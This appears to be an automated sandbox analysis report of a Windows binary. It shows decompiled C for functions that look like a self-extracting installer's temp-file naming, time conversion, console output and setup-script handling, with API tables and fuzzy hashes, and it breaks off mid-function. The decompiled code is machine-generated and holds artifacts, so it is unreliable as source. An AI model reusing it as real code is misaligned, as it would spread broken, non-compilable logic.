0x00199383
0x00000000
0x0019937e
0x00199397
0x0019939c
0x001993a7
0x001993c4
0x00000000
0x001993c6
0x001993cc
0x001993d2
0x001993dc
0x001993de
0x001993e0
0x001993ec
0x001993ec
0x001993fc
0x00199400
0x00199408
0x00199413
0x00199413
0x0019941e
0x00199423
0x00199423
0x001993c4
0x0019930d
0x001992f8
0x001992e7
0x001992bf
0x001992b7
0x00199429
0x0019942f
0x00199439

APIs

__EH_prolog.LIBCMT ref: 0019926D
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00199290
GetShortPathNameW.KERNEL32 ref: 001992AF

Part of subcall function 001A1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0019ACFE,?,?,?,0019ACAD,?,-00000002,?,00000000,?), ref: 001A1426

_swprintf.LIBCMT ref: 0019934B

Part of subcall function 00193E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00193E54

MoveFileW.KERNEL32(?,?), ref: 001993C0
MoveFileW.KERNEL32(?,?), ref: 001993FC

Strings

rtmp%d, xrefs: 00199334

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: 0dbf4d3c9e8c31c96df90a96bc067c149ce636ca83ec6df44383396f63a0ecb6
Instruction ID: 10f213514793de2961d7c2403249a7c77e3c26cfa01b36e835ddca15879ba72b
Opcode Fuzzy Hash: 0dbf4d3c9e8c31c96df90a96bc067c149ce636ca83ec6df44383396f63a0ecb6
Instruction Fuzzy Hash: FB41BF76911218A6DF21EBA8CE84FEE737CBF65781F0044E9B504E3042EB349B85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001A06E0, Relevance: 12.1, APIs: 8, Instructions: 117
timeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E001A06E0(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _t73;
				void* _t81;
				signed int _t85;
				void* _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				signed int* _t92;
				signed int _t94;

				_t87 = __edx;
				_t90 = __ecx;
				_v80 = E001ADEE0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76 = _t87;
				if(E0019A995() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v72);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebp");
					asm("adc ecx, ebp");
					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebp");
					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v72);
				}
				FileTimeToSystemTime( &_v72,  &_v48);
				_t92 = _a4;
				_t81 = 1;
				_t85 = _v48.wDay & 0x0000ffff;
				_t94 = _v48.wMonth & 0x0000ffff;
				_t88 = _v48.wYear & 0x0000ffff;
				_t92[3] = _v48.wHour & 0x0000ffff;
				_t92[4] = _v48.wMinute & 0x0000ffff;
				_t92[5] = _v48.wSecond & 0x0000ffff;
				_t92[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t92 = _v48.wYear & 0x0000ffff;
				_t92[1] = _t94;
				_t92[2] = _t85;
				_t92[8] = _t85 - 1;
				if(_t94 > 1) {
					_t89 = 0x1cd084;
					_t86 = 4;
					while(_t86 <= 0x30) {
						_t86 = _t86 + 4;
						_t92[8] = _t92[8] +  *_t89;
						_t89 = _t89 + 4;
						_t81 = _t81 + 1;
						if(_t81 < _t94) {
							continue;
						}
						break;
					}
					_t88 = _v48.wYear & 0x0000ffff;
				}
				if(_t94 > 2 && E001A0849(_t88) != 0) {
					_t92[8] = _t92[8] + 1;
				}
				_t73 = E001ADF50( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
				_t92[6] = _t73;
				return _t73;
			}

0x001a06e0
0x001a06e7
0x001a06f8
0x001a06fc
0x001a0710
0x001a072e
0x001a073b
0x001a0751
0x001a075d
0x001a076b
0x001a0773
0x001a0779
0x001a077f
0x001a0783
0x001a0785
0x001a0712
0x001a071c
0x001a071c
0x001a0793
0x001a0795
0x001a07a0
0x001a07a1
0x001a07a6
0x001a07ab
0x001a07b0
0x001a07b8
0x001a07c0
0x001a07c8
0x001a07ce
0x001a07d0
0x001a07d3
0x001a07d6
0x001a07db
0x001a07df
0x001a07e4
0x001a07e5
0x001a07ec
0x001a07ef
0x001a07f2
0x001a07f5
0x001a07f8
0x00000000
0x00000000
0x00000000
0x001a07f8
0x001a07fa
0x001a07fa
0x001a0802
0x001a080e
0x001a080e
0x001a081d
0x001a0823
0x001a082c

APIs

__aulldiv.LIBCMT ref: 001A06F3

Part of subcall function 0019A995: GetVersionExW.KERNEL32(?), ref: 0019A9BA

FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 001A071C
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 001A072E
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 001A073B
SystemTimeToFileTime.KERNEL32(?,?), ref: 001A0751
SystemTimeToFileTime.KERNEL32(?,?), ref: 001A075D
FileTimeToSystemTime.KERNEL32(?,?), ref: 001A0793
__aullrem.LIBCMT ref: 001A081D

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 30e179a6dc66c689a1fd46617328a1b6d78ba92d41e08dbdd840e91a0dbae18b
Instruction ID: f5c5e365fb45e77dc7ddabe1cf6ae496392925bf37709b04a4575e0deb716516
Opcode Fuzzy Hash: 30e179a6dc66c689a1fd46617328a1b6d78ba92d41e08dbdd840e91a0dbae18b
Instruction Fuzzy Hash: F64137B6408305AFC711DFA5C88096BFBE8FF88704F004A2EF6D692650E739E548CB56

Uniqueness

Uniqueness Score: -1.00%

Function 001BE2ED, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E001BE2ED(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x1cd668; // 0x44aa1787
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x1f0420 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x1f0420 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E001B9474(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x1f0420 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x1f0420 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x1f0420 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E001B804C( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E001B804C();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									_t48 = _t135 + 8; // 0xff76e900
									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E001AE203(_t135, _v8 ^ _t136);
			}

0x001be2f5
0x001be2fc
0x001be2ff
0x001be307
0x001be30b
0x001be317
0x001be31a
0x001be31d
0x001be324
0x001be32c
0x001be32f
0x001be335
0x001be33b
0x001be340
0x001be342
0x001be345
0x001be34a
0x001be354
0x001be35b
0x001be35e
0x001be365
0x001be36c
0x001be398
0x001be3be
0x001be3c0
0x00000000
0x001be39a
0x001be39d
0x001be464
0x001be470
0x001be47b
0x001be480
0x001be3a3
0x001be3aa
0x001be3af
0x001be3b5
0x001be3bb
0x00000000
0x001be3bb
0x001be3b5
0x001be39d
0x001be36e
0x001be372
0x001be375
0x001be37b
0x001be37d
0x001be380
0x001be384
0x001be3c1
0x001be3c4
0x001be3c5
0x001be3ca
0x001be3d0
0x001be3d6
0x001be3e5
0x001be3eb
0x001be3f1
0x001be3f6
0x001be412
0x001be485
0x001be48b
0x001be414
0x001be414
0x001be41c
0x001be425
0x001be42b
0x00000000
0x001be42d
0x001be42f
0x001be432
0x001be44b
0x00000000
0x001be44d
0x001be451
0x001be453
0x001be456
0x00000000
0x001be456
0x001be451
0x001be44b
0x001be42b
0x001be425
0x001be412
0x001be3f6
0x001be3d0
0x00000000
0x001be459
0x001be459
0x001be48d
0x001be49f

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,001BEA62,00000000,00000000,00000000,00000000,00000000,001B3FBF), ref: 001BE32F
__fassign.LIBCMT ref: 001BE3AA
__fassign.LIBCMT ref: 001BE3C5
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 001BE3EB
WriteFile.KERNEL32(?,00000000,00000000,001BEA62,00000000,?,?,?,?,?,?,?,?,?,001BEA62,00000000), ref: 001BE40A
WriteFile.KERNEL32(?,00000000,00000001,001BEA62,00000000,?,?,?,?,?,?,?,?,?,001BEA62,00000000), ref: 001BE443

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 00848ef6076acc6b73c42d6f9220f815eddd4d443cfbabef1df603e57c648cb6
Instruction ID: 268fca0420d5a2302e2d5d627124018f16a782d8e8034d2932633c574df10fb4
Opcode Fuzzy Hash: 00848ef6076acc6b73c42d6f9220f815eddd4d443cfbabef1df603e57c648cb6
Instruction Fuzzy Hash: 7451A2B1E002499FDB14CFA8DC85AEEBBF9FF09310F14415AE955E7291E7709981CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001ABB5B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E001ABB5B(intOrPtr __ebx, void* __ecx) {
				intOrPtr _t209;
				void* _t210;
				intOrPtr _t263;
				WCHAR* _t277;
				void* _t279;
				WCHAR* _t280;
				void* _t285;

				L0:
				while(1) {
					L0:
					_t263 = __ebx;
					if(__ebx != 1) {
						goto L112;
					}
					L96:
					__eax = __ebp - 0x7c84;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
					E0019AEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L98:
						_push( *0x1cd5f8);
						__ebp - 0x7c84 = E00193E41(0x1d85fa, __edi, L"%s%s%u", __ebp - 0x7c84);
						__eax = E00199E6B(0x1d85fa);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L97:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L99:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x1d85fa);
					__eflags =  *(__ebp - 0x5c84);
					if( *(__ebp - 0x5c84) == 0) {
						while(1) {
							L164:
							_push(0x1000);
							_t197 = _t285 - 0xe; // 0xffffa36e
							_t198 = _t285 - 0xd; // 0xffffa36f
							_t199 = _t285 - 0x5c84; // 0xffff46f8
							_t200 = _t285 - 0xfc8c; // 0xfffea6f0
							_push( *((intOrPtr*)(_t285 + 0xc)));
							_t209 = E001AA156();
							_t263 =  *((intOrPtr*)(_t285 + 0x10));
							 *((intOrPtr*)(_t285 + 0xc)) = _t209;
							if(_t209 != 0) {
								_t210 = _t285 - 0x5c84;
								_t279 = _t285 - 0x1bc8c;
								_t277 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E001A1410(_t285 - 0xfc8c,  *((intOrPtr*)(0x1cd618 + _t280 * 4))) != 0) {
								_t280 =  &(_t280[0]);
								if(_t280 < 0xe) {
									continue;
								} else {
									goto L164;
								}
							}
							__eflags = _t280 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t280 * 4 +  &M001AC0D7))) {
								case 0:
									L9:
									__eflags = _t263 - 2;
									if(_t263 != 2) {
										goto L164;
									}
									L10:
									_t282 = 0x800;
									E001A95F8(_t285 - 0x7c84, 0x800);
									E0019A188(E0019B625(_t285 - 0x7c84, _t285 - 0x5c84, _t285 - 0xdc8c, 0x800), _t263, _t285 - 0x8c8c, 0x800);
									 *(_t285 - 4) = _t277;
									E0019A2C2(_t285 - 0x8c8c, _t285 - 0xdc8c);
									E00196EF9(_t285 - 0x3c84);
									_push(_t277);
									_t271 = _t285 - 0x8c8c;
									_t224 = E0019A215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
									__eflags = _t224;
									if(_t224 == 0) {
										L26:
										 *(_t285 - 4) =  *(_t285 - 4) | 0xffffffff;
										E0019A19E(_t285 - 0x8c8c);
										goto L164;
									} else {
										goto L13;
										L14:
										E0019B1B7(_t271, __eflags, _t285 - 0x7c84, _t285 - 0x103c, _t282);
										E0019AEA5(__eflags, _t285 - 0x103c, _t282);
										_t284 = E001B2B33(_t285 - 0x7c84);
										__eflags = _t284 - 4;
										if(_t284 < 4) {
											L16:
											_t252 = E0019B5E5(_t285 - 0x5c84);
											__eflags = _t252;
											if(_t252 != 0) {
												goto L26;
											}
											L17:
											_t254 = E001B2B33(_t285 - 0x3c84);
											__eflags = 0;
											 *((short*)(_t285 + _t254 * 2 - 0x3c82)) = 0;
											E001AE920(_t277, _t285 - 0x3c, _t277, 0x1e);
											_t287 = _t287 + 0x10;
											 *((intOrPtr*)(_t285 - 0x38)) = 3;
											_push(0x14);
											_pop(_t257);
											 *((short*)(_t285 - 0x2c)) = _t257;
											 *((intOrPtr*)(_t285 - 0x34)) = _t285 - 0x3c84;
											_push(_t285 - 0x3c);
											 *0x1cdef4();
											goto L18;
										}
										L15:
										_t262 = E001B2B33(_t285 - 0x103c);
										__eflags = _t284 - _t262;
										if(_t284 > _t262) {
											goto L17;
										}
										goto L16;
										L18:
										_t229 = GetFileAttributesW(_t285 - 0x3c84);
										__eflags = _t229 - 0xffffffff;
										if(_t229 == 0xffffffff) {
											L25:
											_push(_t277);
											_t271 = _t285 - 0x8c8c;
											_t231 = E0019A215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
											__eflags = _t231;
											if(_t231 != 0) {
												_t282 = 0x800;
												L13:
												SetFileAttributesW(_t285 - 0x3c84, _t277);
												__eflags =  *((char*)(_t285 - 0x2c78));
												if(__eflags == 0) {
													goto L18;
												}
												goto L14;
											}
											goto L26;
										}
										L19:
										_t233 = DeleteFileW(_t285 - 0x3c84);
										__eflags = _t233;
										if(_t233 != 0) {
											goto L25;
										} else {
											_t283 = _t277;
											_push(_t277);
											goto L22;
											L22:
											E00193E41(_t285 - 0x103c, 0x800, L"%s.%d.tmp", _t285 - 0x3c84);
											_t287 = _t287 + 0x14;
											_t238 = GetFileAttributesW(_t285 - 0x103c);
											__eflags = _t238 - 0xffffffff;
											if(_t238 != 0xffffffff) {
												_t283 = _t283 + 1;
												__eflags = _t283;
												_push(_t283);
												goto L22;
											} else {
												_t241 = MoveFileW(_t285 - 0x3c84, _t285 - 0x103c);
												__eflags = _t241;
												if(_t241 != 0) {
													MoveFileExW(_t285 - 0x103c, _t277, 4);
												}
												goto L25;
											}
										}
									}
								case 1:
									L27:
									__eflags = __ebx;
									if(__ebx == 0) {
										__eax =  *0x1ece0c;
										__eflags =  *0x1ece0c;
										__ebx = __ebx & 0xffffff00 |  *0x1ece0c == 0x00000000;
										__eflags = __bl;
										if(__bl == 0) {
											__eax =  *0x1ece0c;
											_pop(__ecx);
											_pop(__ecx);
										}
										L30:
										__bh =  *((intOrPtr*)(__ebp - 0xd));
										__eflags = __bh;
										if(__eflags == 0) {
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__esi = E001AA2AE(__ecx, __edx, __eflags);
											__eax =  *0x1ece0c;
										} else {
											__esi = __ebp - 0x5c84;
										}
										__eflags = __bl;
										if(__bl == 0) {
											__edi = __eax;
										}
										L35:
										__eax = E001B2B33(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0x1ece0c);
										__eax = E001B2B5E(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax != 0) {
											 *0x1ece0c = __eax;
											__eflags = __bl;
											if(__bl != 0) {
												__ecx = 0;
												__eflags = 0;
												 *__eax = __cx;
											}
											__eax = E001B66ED(__eax, __esi);
											_pop(__ecx);
											_pop(__ecx);
										}
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L001B2B4E(__esi);
										}
									}
									goto L164;
								case 2:
									L41:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
									}
									goto L164;
								case 3:
									L43:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L164;
									}
									L44:
									__eflags =  *0x1d9602 - __di;
									if( *0x1d9602 != __di) {
										goto L164;
									}
									L45:
									__eax = 0;
									__edi = __ebp - 0x5c84;
									_push(0x22);
									 *(__ebp - 0x103c) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x5c84) - __ax;
									if( *(__ebp - 0x5c84) == __ax) {
										__edi = __ebp - 0x5c82;
									}
									__eax = E001B2B33(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L164;
									} else {
										L48:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L52:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L64:
												__ebp - 0x103c = E0019FAB1(__ebp - 0x103c, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L65:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x103c;
												__eax = E001B0D9B(__ebp - 0x103c, __ebp - 0x103c);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
													if( *((intOrPtr*)(__eax + 2)) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x103c;
												__edi = 0x1d9602;
												E0019FAB1(0x1d9602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
												__eax = E001A9FFC(__ebp - 0x103c, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
												__ebx =  *0x1cdf7c;
												__eax = SendMessageW(__esi, 0x143, __ebx, 0x1d9602); // executed
												__eax = __ebp - 0x103c;
												__eax = E001B2B69(__ebp - 0x103c, 0x1d9602, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x103c = 0;
													__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
												}
												goto L164;
											}
											L53:
											__eflags = __ax;
											if(__ax == 0) {
												L55:
												__eax = __ebp - 0x18;
												__ebx = 0;
												_push(__ebp - 0x18);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0x1cdea8();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x103c;
													_push(__ebp - 0x103c);
													__eax = __ebp - 0x1c;
													_push(__ebp - 0x1c);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x18));
													__eax =  *0x1cdea4();
													_push( *(__ebp - 0x18));
													 *0x1cde84() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *((short*)(__ebp + __eax * 2 - 0x103c)) = __cx;
												}
												__eflags =  *(__ebp - 0x103c) - __bx;
												if( *(__ebp - 0x103c) != __bx) {
													__eax = __ebp - 0x103c;
													__eax = E001B2B33(__ebp - 0x103c);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x103c = E0019FA89(__eflags, __ebp - 0x103c, "\\", __esi);
													}
												}
												__esi = E001B2B33(__edi);
												__eax = __ebp - 0x103c;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x103c = E0019FA89(__eflags, __ebp - 0x103c, __edi, 0x800);
												}
												goto L65;
											}
											L54:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L64;
											}
											goto L55;
										}
										L49:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L52;
										}
										L50:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L164;
										}
										L51:
										__ebp - 0x103c = E0019FAB1(__ebp - 0x103c, __edi, 0x800);
										goto L65;
									}
								case 4:
									L70:
									__eflags =  *0x1d95fc - 1;
									__eflags = __eax - 0x1d95fc;
									 *__edi =  *__edi + __ecx;
									__eflags =  *(__ebx + 6) & __bl;
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L75:
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L82:
										 *0x1d75d2 = __cl;
										 *0x1d75d3 = 1;
										goto L164;
									}
									L76:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0x1d75d2 = __cl;
										L81:
										 *0x1d75d3 = __cl;
										goto L164;
									}
									L77:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L82;
									}
									L78:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L164;
									}
									L79:
									 *0x1d75d2 = 1;
									goto L81;
								case 6:
									L88:
									__eflags = __ebx - 4;
									if(__ebx != 4) {
										goto L92;
									}
									L89:
									__eax = __ebp - 0x5c84;
									__eax = E001B2B69(__ebp - 0x5c84, __eax, L"<>");
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax == 0) {
										goto L92;
									}
									L90:
									_push(__edi);
									goto L91;
								case 7:
									goto L0;
								case 8:
									L116:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x5c84) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x5c84;
											_push(__ebp - 0x5c84);
											__eax = E001B668C(__ebx, __edi);
											_pop(__ecx);
											 *0x1ede1c = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0x1ede18 = E001AA2AE(__ecx, __edx, __eflags);
									}
									 *0x1e5d03 = 1;
									goto L164;
								case 9:
									L121:
									__eflags = __ebx - 5;
									if(__ebx != 5) {
										L92:
										 *0x1ede20 = 1;
										goto L164;
									}
									L122:
									_push(1);
									L91:
									__eax = __ebp - 0x5c84;
									_push(__ebp - 0x5c84);
									_push( *(__ebp + 8));
									__eax = E001AC431();
									goto L92;
								case 0xa:
									L123:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L164;
									}
									L124:
									__eax = 0;
									 *(__ebp - 0x2c3c) = __ax;
									__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
									__eax = E001B59C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
									_push(0x800);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										_push(0x1ead0a);
										__eax = __ebp - 0x2c3c;
										_push(__ebp - 0x2c3c);
										__eax = E0019FAB1();
										 *(__ebp - 0x14) = 2;
									} else {
										__eflags = __eax - 0x54;
										__eax = __ebp - 0x2c3c;
										if(__eflags == 0) {
											_push(0x1e9d0a);
											_push(__eax);
											__eax = E0019FAB1();
											 *(__ebp - 0x14) = 7;
										} else {
											_push(0x1ebd0a);
											_push(__eax);
											__eax = E0019FAB1();
											 *(__ebp - 0x14) = 0x10;
										}
									}
									__eax = 0;
									 *(__ebp - 0x9c8c) = __ax;
									 *(__ebp - 0x1c3c) = __ax;
									__ebp - 0x19c8c = __ebp - 0x6c84;
									__eax = E001B4D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
									_pop(__ecx);
									_pop(__ecx);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) != __bx) {
										L132:
										__ebp - 0x6c84 = E00199E6B(__ebp - 0x6c84);
										__eflags = __al;
										if(__al != 0) {
											goto L149;
										}
										L133:
